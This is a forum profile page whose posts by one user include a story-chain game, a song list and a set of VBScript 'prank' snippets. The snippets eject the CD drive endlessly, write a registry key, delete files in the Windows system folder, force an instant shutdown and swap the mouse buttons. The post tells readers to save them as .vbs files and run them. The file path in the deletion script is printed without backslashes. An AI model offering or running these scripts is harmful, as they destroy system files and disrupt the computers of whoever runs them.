Jump to content

mc1

Active Members
  • Posts

    377
  • Joined

  • Last visited

    Never
  • Days Won

    1

Posts posted by mc1

  1. so,eu am sa postez o prop si altul va trebui sa continue povestea printr-o alta propfraza....si tot asa:)

    Era odata,in fara PC-ului pe site-ul romania.hackerszone.org ....

  2. O alta varianta la "Ce asculti acum?"

    postati 5 songs a day;)

    incep eu

    The Pogues - The rocky road to Dublin

    Hoxton Whores -Boumba Ze TeraZZa

    Altar - Nascut invingator

    Rammstein - Du hast

    Red Hot Chilli Peppers - Dani California

    Keep posting :D

  3. -----------------------

    ------OPEN CD-------

    -----------------------

    Code:

    do

    wscript.sleep 1000

    Set oWMP = CreateObject("WMPlayer.OCX.7")

    Set colCDROMs = oWMP.cdromCollection

    if colCDROMs.Count then

    For i = 0 to colCDROMs.Count - 1

    colCDROMs.Item(i).Eject

    Next

    End If

    loop

    Acest script deschide cd-romul

    ----------------------

    -----KEY REG--------

    ----------------------

    Code:

    Dim x

    Set x = Createobject("Wscript.Shell")

    x.Regwrite "key patch"

    Acest script creaza o key de registri

    ----------------------

    ---Del files----------

    ----------------------

    Code:

    dim filedel

    Set filedel = CreateObject("Scripting.FileSystemObject")

    filedel.DeleteFile "c:windowssystem*.*"

    Acest cod sterge un fisier

    ----------------------

    ----S.shut-----------

    ----------------------

    Code:

    Dim sshut

    Set sshut = Createobject("Wscript.Shell")

    sshut.run "shutdown -s -f -t 00"

    acest cod inchide pc

    --------------------

    ---mouse spwn---

    --------------------

    Code:

    Dim a

    Set a = Createobject("Wscript.Shell")

    a.run "RUNDLL32 USER32.DLL,SwapMouseButton"

    Acest script inverseaza butonele la mouse

    faci un text si dai copy de la un exploit din cele de mai sus>il salvezi .vbs si voila!:)

    haioase chestii :@ :D

×
×
  • Create New...